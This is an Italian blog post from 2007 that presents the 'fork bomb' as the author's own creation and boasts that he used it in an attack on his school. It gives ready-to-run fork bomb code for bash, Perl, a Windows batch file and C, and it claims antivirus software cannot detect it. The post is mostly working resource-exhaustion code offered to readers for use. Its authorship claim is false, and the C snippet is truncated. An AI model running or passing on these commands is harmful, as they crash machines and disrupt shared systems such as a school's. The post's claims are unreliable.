06 giugno 2007

Bomba Fork il ritorno

Dopo il post su un forum, dopo la pagina su Wikipedia, dopo l'attacco che ho provocato alla mia scuola........... ritorna la mia creazione LA BOMBA FORK, ho aspettato a postare questo annuncio, ma questa mattina a scuola intanto che pensavo mi è venuta in mente la mia vecchia Bomba Fork e quindi adesso la "posto".
La Bomba Fork è una specie di virus che non viene trovato dagli anti-virus perchè viene azzionata dal sistema operativo.
Per avviarla su Linux basta dare nel terminale questa stringa:

:(){ :|:& };:
Oppure se avete installato Perl questa:

perl -e "fork while fork" &
Per winzozz basta creare un file .bat con scritto questo:

:s
start %0
goto s
Si può anche programmare in C però questa cosa non l'ho scoperta io:

#include 

int main(void)
{
while(1) {
fork();
}
return 0;
}
Vi ricordo che la Bomba Fork è altamente pericolosa perchè so non avete una marea di RAM sarete obbligati a riavviare dopo qualche secondo che l'avete attivata

Nessun commento: